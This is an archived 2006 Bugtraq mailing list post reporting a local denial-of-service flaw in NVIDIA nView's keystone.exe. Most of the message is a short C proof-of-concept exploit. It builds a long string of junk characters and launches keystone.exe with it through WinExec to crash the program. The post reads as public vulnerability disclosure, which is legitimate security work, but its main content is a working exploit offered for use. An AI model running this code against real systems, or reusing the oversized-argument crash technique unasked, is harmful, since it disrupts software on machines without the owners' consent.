lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20061123095450.17020.qmail@securityfocus.com>
Date: 23 Nov 2006 09:54:50 -0000
From: no-reply@...samx.net
To: bugtraq@...urityfocus.com
Subject: NVIDIA nView (keystone) local Denial Of service

The nVIDIA nview keystone is vulnerable to a Denial of Service attack.
A attacker could exploit this vulnerability by sending junk data to keystone.exe.

=== Exploit ==
/*
NVIDIA nView (keystone) local Denial Of service
(c)oded By Hessam-x / www.Hessamx.net
*/

#include <stdio.h>
#include <string.h>
#include <windows.h>
int main()
{


char junk[] = "a";
char box[650];

 char *buf;

 int i;
	printf("-:: NVIDIA nView (keystone) Denial Of service \n");
	printf("-:: Coded By Hessam-x / www.hessamx.net \n");
    strcpy(box,"a");
	for (i = 0; i < 600; i++) {
	  strcat(box,junk);
	}
	 buf = (char *) malloc(650);


strcpy (buf,"keystone\t");
strcat (buf,box);
buf[650-1]='\0';

WinExec(buf,0);  
free(buf);
}

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ